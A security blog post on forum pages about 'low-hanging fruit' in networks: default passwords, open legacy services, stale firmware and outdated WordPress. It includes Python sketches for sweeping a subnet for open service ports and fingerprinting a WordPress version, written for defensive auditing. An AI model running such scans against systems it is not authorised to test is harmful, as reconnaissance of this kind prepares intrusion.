    When you look at your servers or surrounding networks, what exactly do you see ? A work of art, perhaps ? Sadly, this is anything but the picture painted for most networks when you begin to look under the hood. What I’m alluding to here is that beauty is only skin deep - in the sense that neat cabling resembling art from the Sistine Chapel, tidy racks, and huge comms rooms full of flashing lights look appealing from the eye candy perspective and will probably impress clients, but in several cases, this is the ultimate wolf in sheep’s clothing. Sounds harsh ? Of course it does, but with good intentions and reasoning. There’s not a single person responsible for servers and networks on this planet who will willingly admit that whilst his or her network looks like a masterpiece to the untrained eye, it’s a complete disaster in terms of security underneath.

    In reality, it’s quite the opposite. Organisations often purchase bleeding edge infrastructure as a means of leveraging the clear technical advantages, enhanced security, and competitive edge it provides. However, under the impressive state of the art ambience and air conditioning often lies an unwanted beast. This mostly invisible beast lives on low-hanging fruit, will be tempted to help itself at any given opportunity, and is always hungry. For those becoming slightly bewildered at this point, there really isn’t an invisible beast lurking around your network that eats fruit. But, with a poorly secured infrastructure, there might as well be. The beast being referenced here is an uninvited intruder in your network. A bad actor, threat actor, bad guy, criminal… call it what you want (just don’t use the word hacker) - they can find their way inside your network by leveraging the one thing that I’ve seen time and time again in literally every organisation I ever worked for throughout my career - the default username and password. I really can’t stress enough the importance of changing this on new (and existing) network equipment, and it doesn’t stop there either.

    Changing the default username and password is about 10% of the puzzle when it comes to security and basic protection principles. Even the most complex credentials can be bypassed completely by a vulnerability (or in some cases, a backdoor) in ageing firmware on switches, firewalls, routers, storage arrays, and a wealth of other devices - including printers, which incidentally make an ideal watering hole thanks to the defaults of FTP, HTTP, SNMP, and Telnet, most (if not all) of which are usually left on. As cheaper printers do not have screens like their more expensive copier counterparts (the estate is reduced to make the device smaller and cheaper), any potential criminal can hide here and not be detected - often for months at a time - and arguably, they could live in a copier without you being aware either. A classic example of an unknown exploit into a system was the Juniper firewall backdoor that permitted full admin access using a specific password - regardless of the one set by the owner. Whilst the Juniper exploit didn’t exactly involve a default username and password as such (the backdoor was hard-coded into the firmware, meaning that any “user” with the right coded password and remote SSH access would achieve full control over the device), it did leverage the fact that poorly configured devices could have SSH accessible to 0.0.0.0/0 (essentially, the entire planet) rather than a trusted set of IP addresses - typically from an approved management network.

    We all need to get out of the mindset of taking something out of a box, plugging it into our network, and then doing nothing else - such as changing the default username and password (ideally disabling it completely and replacing it with a unique ID), or turning off access protocols that we do not want or need. The real issue here is that today’s technology standards make it simple for literally anyone to purchase something and set it up within a few minutes, without considering that a simple port scan of a subnet can reveal a wealth of information to an attacker - several of these tools are equipped with a default username and password dictionary that is leveraged against the device in question if it responds to a request. Changing the default configuration instead of leaving it to chance can dramatically reduce the attack landscape in your network. Failure to do so changes “plug and play” to “ripe for picking”, and it’s those devices that perform seemingly “minor” functions in your network that are the easiest to exploit - and leverage in order to gain access to neighbouring ancillary services. Whilst not an immediate gateway into another device, the compromised system can easily give an attacker a good overview of what else is on the same subnet, for example.
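
    To make that point a little more concrete, here’s a minimal sketch (standard library Python only) of the kind of sweep an attacker - or, more usefully, you - can run against a subnet to see which hosts still answer on the classic default service ports. The subnet shown is a hypothetical placeholder; only point something like this at networks you own or are explicitly authorised to test, and note that SNMP (UDP 161) can’t be probed with a simple TCP connect like the ports below.

    # Which hosts on a subnet answer on the classic default-service ports?
    # Standard library only. 192.0.2.0/28 is a hypothetical placeholder subnet -
    # only scan networks you own or are authorised to test.
    import ipaddress
    import socket
    from concurrent.futures import ThreadPoolExecutor

    SUBNET = "192.0.2.0/28"
    PORTS = {21: "ftp", 22: "ssh", 23: "telnet", 80: "http", 443: "https"}

    def is_open(host: str, port: int, timeout: float = 0.5) -> bool:
        """Return True if the TCP port accepts a connection."""
        try:
            with socket.create_connection((host, port), timeout=timeout):
                return True
        except OSError:
            return False

    def sweep(subnet: str) -> None:
        hosts = [str(ip) for ip in ipaddress.ip_network(subnet).hosts()]
        # Probe every host/port pair in parallel; the pool waits for all results.
        with ThreadPoolExecutor(max_workers=64) as pool:
            futures = {(host, name): pool.submit(is_open, host, port)
                       for host in hosts for port, name in PORTS.items()}
        exposed = {}
        for (host, name), future in futures.items():
            if future.result():
                exposed.setdefault(host, []).append(name)
        for host, services in sorted(exposed.items()):
            print(f"{host}: {', '.join(services)}")

    if __name__ == "__main__":
        sweep(SUBNET)

    Anything that shows up here with Telnet or FTP still listening is exactly the low-hanging fruit described below.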

    So how did we arrive at the low hanging fruit paradigm ?

    It’s simple enough if you consider the way that fruit can weigh down the branch to the point where it is low enough to be picked easily. A poorly secured network contains many vulnerabilities that can be leveraged and exploited very easily without the need for much effort on the part of an attacker. It’s almost like a horse grazing in a field next to an orchard where the apples hang over the fence. It’s easily picked, often overlooked, and gone in seconds. When this term is used in information security, a common parallel is the path of least resistance. For example, a pickpocket can acquire your wallet without you even being aware, and this requires a high degree of skill in order to evade detection yet still achieve the primary objective. On the other hand, someone strolling down the street with an expensive camera hanging over their shoulder is a classic example of the low hanging fruit synopsis in the sense that this theft is based on an opportunity that wouldn’t require much effort - yet with a high yield. Here’s an example of how that very scenario could well play out.

    Now, as much as we’d all like to handle cyber crime in this way, we can’t. It’s illegal 🙂

    What isn’t illegal is prevention. 80% of security is based on best practice. Admittedly, there is a fair argument as to what exactly is classed as “best” these days, although it’s a relatively well known fact that patching the Windows operating system, for example, is one of the best ways to stamp out a vulnerability - but only for the system that the patch is designed to protect. Windows is just the tip of the iceberg when it comes to vulnerabilities - it’s not just operating systems that suffer, but applications, too. You could take a Windows based IIS server, harden it in terms of permitted protocols and services, plus install all of the available patches - yet have an outdated version of WordPress running (see here for some tips on how to reduce that threat), or often even worse, outdated plugins that allow remote code execution. The low hanging fruit problem becomes even more obvious when you consider breaches such as the well-publicised Mossack Fonseca (“Panama Papers”) case. What became clear after investigation is that the attackers leveraged vulnerabilities in the firm’s public facing WordPress and Joomla installations - this in fact led to them being able to exploit an equally vulnerable mail server by brute-forcing it.
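
    As a small illustration of just how visible an outdated WordPress installation can be, here’s a hedged sketch (standard library Python; example.com is a placeholder) that simply checks the two places a stock install leaks its version - the generator meta tag and the bundled readme.html. Hardened sites strip both, so an empty result proves nothing, and as ever, only run it against sites you control.

    # Does a WordPress site advertise its version? Checks the generator meta tag
    # and the stock readme.html. "example.com" is a placeholder - only test sites
    # you own. A silent site is not necessarily a patched site.
    import re
    import urllib.request

    SITE = "https://example.com"

    def fetch(url: str) -> str:
        try:
            with urllib.request.urlopen(url, timeout=10) as response:
                return response.read().decode("utf-8", errors="replace")
        except OSError:
            return ""

    def advertised_version(site: str):
        # Default themes emit: <meta name="generator" content="WordPress 6.x" />
        match = re.search(r'content="WordPress ([0-9.]+)"', fetch(site))
        if match:
            return match.group(1)
        # The stock readme shipped with core also states the version
        match = re.search(r"Version ([0-9.]+)", fetch(site + "/readme.html"))
        return match.group(1) if match else None

    if __name__ == "__main__":
        version = advertised_version(SITE)
        print(f"Advertised WordPress version: {version or 'not disclosed'}")

    If the version that comes back is behind the current release (or any plugin is), that is the low-hanging fruit an attacker will reach for first.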

    So what should you do ? The answer is simple. It’s harvest time.

    If there is no low-hanging fruit to pick, life becomes that much more difficult for any attacker looking for a quick “win”. Unless they are determined, it’s unlikely that your average attacker is going to spend a significant amount of time on a target (unless it’s Fort Knox - then you’d have to question the sophistication), only to walk away empty handed with nothing to show for the effort. To this end, below are my top recommendations. They are not new, far from exhaustive, and certainly not rocket science - yet they are surprisingly missing from the “security 101” perspective in several organisations.

    - Change the default username and password on ALL infrastructure. It doesn’t matter if it’s not publicly accessible - this is irrelevant when you consider how many threats originate from the inside. If you have to keep the default username (in other words, it can’t be disabled), give it the lowest possible access permissions and configure a strong password.
    - Close all windows - in this case, lock down protocols and ports that are not essential - and if you really do need them open, ensure that they are restricted (a quick audit sketch follows this list).
    - Deploy MFA (or at least 2FA) on all public-facing systems and on those that contain sensitive or personally identifiable information.
    - Deploy adequate monitoring and logging, with a sane level of retention. Without any means of forensic examination, a bad actor can be in and out of your network well before you even realise a breach may have taken place. Without decent logging, you have no way of confirming - or even worse, quantifying - your suspicion, and that can spell disaster in regulated industries. Don’t shoot yourself in the foot.
    - Ensure all Windows servers and PCs are up to date with the latest patches. The same applies to Linux and Mac systems - despite the hype, they are vulnerable to an extent (though not in the same way as Windows), although attacks are notoriously more difficult to deploy and typically need to take the form of a rootkit to work properly.
    - Do not let routers, firewalls, switches, etc. “slip” in terms of firmware updates. Keep yourself and your team regularly informed about the latest vulnerabilities, assess their impact, and most importantly, plan an update review. Not upgrading firmware on critical infrastructure can have a dramatic effect on your overall security.
    - Lock down USB ports and CD/DVD drives, and do not permit access to file sharing, social media, or web-based email. This has been an industry standard for years, but you’d be surprised at just how many organisations still leave these open and do not consider it a risk.
    - Reduce the attack surface by segmenting your network using VLANs. For example, the sales VLAN does not (and shouldn’t) need to connect directly to accounting. A ransomware or malware outbreak in sales would then not traverse to other VLANs, restricting the spread. A flat network is simple to manage, but it’s a level playing field for an attacker if all the assets sit in the same space.
    - Don’t use an account with admin rights to perform your daily duties. There are no prizes for guessing the level of potential damage this can cause if your account is compromised, or you end up with malware on your PC.
    - Educate and phish your users on a continual basis. They are the gateway directly into your network, and bypassing them is surprisingly easy. You only have to look at the success of phishing campaigns to realise that they are (and always will be) the weakest link in your network.
    - Devise a consistent security and risk review framework. Conducting periodic security reviews is always a good move, and you’d be surprised at just what is lurking around on your network without your knowledge. There needn’t be a huge budget for this: a number of open source projects and platforms make the identification simple, although you’ll still need to complete the “grunt” work in terms of remediation. I am currently authoring a framework that will be open source, and will share it with the community once it is completed.
    - Conduct regular governance and due diligence on vendors - particularly those that handle information considered sensitive (think GDPR). If their network is breached, any information they hold about your network and associated users is also at risk.
    - Identify weak or potential risk areas within your network, and engage with business leaders and management to raise awareness of best practice and information security.
    - Perform breach simulations, and engage senior management in the exercise. As they are the fundamental core of the business function, they also need to understand the risk and, more importantly, the decisions and communication that are inevitable post-breach.
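    As promised above, here’s a minimal sketch of the kind of quick check the “close all windows” point is getting at: it probes a handful of internal hosts for ports you have decided should not be reachable. The host and port lists are purely hypothetical examples - substitute your own, and treat this as a starting point rather than a finished audit tool.

```python
# Minimal sketch: flag non-essential TCP ports that are still reachable on
# internal hosts. The host and port lists below are hypothetical examples.
import socket

HOSTS = ["192.168.10.5", "192.168.10.6"]        # assumed internal addresses
UNWANTED_PORTS = [21, 23, 135, 139, 445, 3389]  # FTP, Telnet, RPC, NetBIOS, SMB, RDP


def port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


for host in HOSTS:
    exposed = [port for port in UNWANTED_PORTS if port_open(host, port)]
    if exposed:
        print(f"{host}: review these open ports -> {exposed}")
    else:
        print(f"{host}: no unwanted ports reachable")
```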

    There is no silver bullet when it comes to protecting your network, information, and reputation. However, the list above will form the basis of a solid framework.

    Let’s not be complacent - let’s be compliant.

  • 0 Votes
    3 Posts
    286 Views

    @justoverclock yes, completely understand that. It’s a haven for criminal gangs and literally everything is on the table. Drugs, weapons, money laundering, cyber attacks for rent, and even murder for hire.

    Nothing, it seems, is off limits. The dark web is truly a place where the only limitation is the amount you are prepared to spend.

  • 0 Votes
    1 Posts
    347 Views

    tech.jpeg
    Ever heard of KISS ? Nope - not these guys

    kiss.jpeg
    What I’m referring to is the “keep it simple, stupid” principle - an acronym reportedly coined by Kelly Johnson, lead engineer at the Lockheed Skunk Works (creators of the Lockheed U-2 and SR-71 Blackbird spy planes, among many others), to describe the relationship between the way things break and the sophistication available to repair them. You might be puzzled as to why I’d write about something like this, but it’s a situation I see constantly - one I like to refer to as “over-thinker syndrome”. What do I mean by this? Here’s the theory. Some people are very analytical when it comes to problem solving. Couple that with technical knowledge and you can end up in a situation where something relatively simple gets blown out of all proportion, because the scenario played out in the mind is often much further from reality than you’d expect. And the technical reasoning is almost always to blame.

    Some years ago, in a previous career, a colleague noticed that the Exchange Server (2003, wouldn’t you know) would suddenly reboot halfway through a backup job. Rightly so, he wanted to investigate and asked me if this would be ok. Anyone with an ounce of experience knows that functional backups are critical in the event of a disaster – none more so than I – so obviously, I gave the go-ahead. One bright spark in my team suggested a reboot of the server, which immediately prompted the response

    “……it’s rebooting itself every day, so how will that help ?”

    There’s always one, isn’t there? The final (and honestly, more realistic) suggestion was to enable verbose logging in Exchange. This is actually a good idea, but only if you suspect that the information store could be the issue. Given the evidence, I wasn’t convinced. If there was corruption in the store, or on any of the disks, it would show itself randomly throughout the day and wouldn’t wait until 2am to do so. Not wanting to come across as condescending, I agreed, but at the same time set a deadline for escalation. I wasn’t overly concerned about the backups, as these were being completed manually each day whilst the investigation took place. Nor was I concerned about what could be seen as wasting someone’s time - particularly when you think you may already have the answer to what now seemed to be an impossible problem. This is where experience will eclipse formal qualifications hands down. Those with university degrees may scoff at this, but highly analytical thinkers often seem to avoid logic like the plague and go off on a wild tangent, looking for a dramatically technical explanation and solution to a problem that is much simpler than they expect.

    After witnessing the pained expression on the face of my now exasperated and exhausted tech, I said “let’s get a coffee”. In agreement, he followed me to the kitchen and then asked me what I thought the problem could be. I said that if he wanted my advice, it would be to step back and look at the problem from a logical angle rather than a technical one. The confused look I received was priceless – the guy must have really thought I’d lost the plot. After what seemed like an eternity (although in reality only a few seconds), he asked me what I meant. “Come with me”, I said. Finishing his coffee, he diligently followed me to the server room. Once inside, I asked him to show me the Exchange Server. Puzzled, he correctly pointed out the exact machine. I then asked him to trace the power cables and tell me where they went.

    As with most server rooms, locating and identifying cables can be a bit of a challenge after equipment has been added and removed, so this took a little longer than we expected. Eventually, the tech traced the cables back to

    …an old-looking UPS with a red light illuminated on the front, like it had been a prop in a Terminator film.

    Suddenly, the real cause of the issue dawned on the tech like a morning sunrise over the Serengeti. The UPS that the Exchange Server was unexpectedly connected to had a faulty battery. The UPS ran a self-test at 2am each morning, and because that test failed owing to the burnt-out battery, the connected server lost power, then started back up once the offending equipment left bypass mode and went back online.

    Where is this going, you might ask? Here’s the moral of this particular story:

    - Just because a problem involves technology, it doesn’t mean that the answer has to be a complex technical one.
    - Logic and common sense have a part to play in all of our lives. Sometimes it makes more sense to step back, take a breath, and see something for what it really is before deciding to commit.
    - It’s easy to allow technical expertise to cloud your judgement – don’t fall into the trap of using a sledgehammer to break an egg.
    - You cannot buy experience – it’s earned, gained, and leaves an indelible mark.
  • 0 Votes
    1 Posts
    222 Views

    I’m excited to announce that a new blog section has been added 😛 The blog is actually using Ghost rather than NodeBB, and sits on its own subdomain of https://content.sudonix.com (if you ever fancy hitting it directly).
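    If you do want to hit the blog programmatically, here’s a minimal sketch using Ghost’s Content API. This assumes the Content API is enabled and that you’ve created a Content API key in the Ghost admin area - the key below is a placeholder, not a real one.

```python
# Minimal sketch: list recent posts from the Ghost blog via its Content API.
# Assumption: the Content API is enabled and CONTENT_API_KEY is a key you
# created in Ghost admin - the value below is only a placeholder.
import json
import urllib.parse
import urllib.request

BASE_URL = "https://content.sudonix.com/ghost/api/content/posts/"
CONTENT_API_KEY = "YOUR_CONTENT_API_KEY"  # placeholder

params = urllib.parse.urlencode({
    "key": CONTENT_API_KEY,
    "limit": 5,
    "fields": "title,url,published_at",
})

with urllib.request.urlopen(f"{BASE_URL}?{params}") as response:
    posts = json.load(response)["posts"]

for post in posts:
    print(f"{post['published_at']}  {post['title']} -> {post['url']}")
```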

    We’ve moved all the blog articles out of the existing category here and migrated them to the Ghost platform. However, you can still comment on these articles just as if they were part of the root system. If you pick a blog article whilst logged in

    7e61c35b-2304-4c06-bda2-34da52252e1a-image.png

    Then choose the blog article you want to read

    7ca5089e-cf7e-4050-b951-5426fd1c6ec3-image.png

    Once opened, you’ll see a short synopsis of the article

    1bc086b4-5968-4e81-bc47-70de263b2275-image.png

    Click the link to read the rest of the post. Scroll down to the bottom, and you’ll see a space where you can provide your comments! Take the time to read the articles and provide your own feedback - I’d love to hear it.

    3f712e7c-475d-42d4-a5ca-b4becff6cc2e-image.png

    The blog component is not quite finished yet - it needs some polish, and there are a few bugs scattered here and there, but these will only manifest themselves if a certain sequence of events occurs.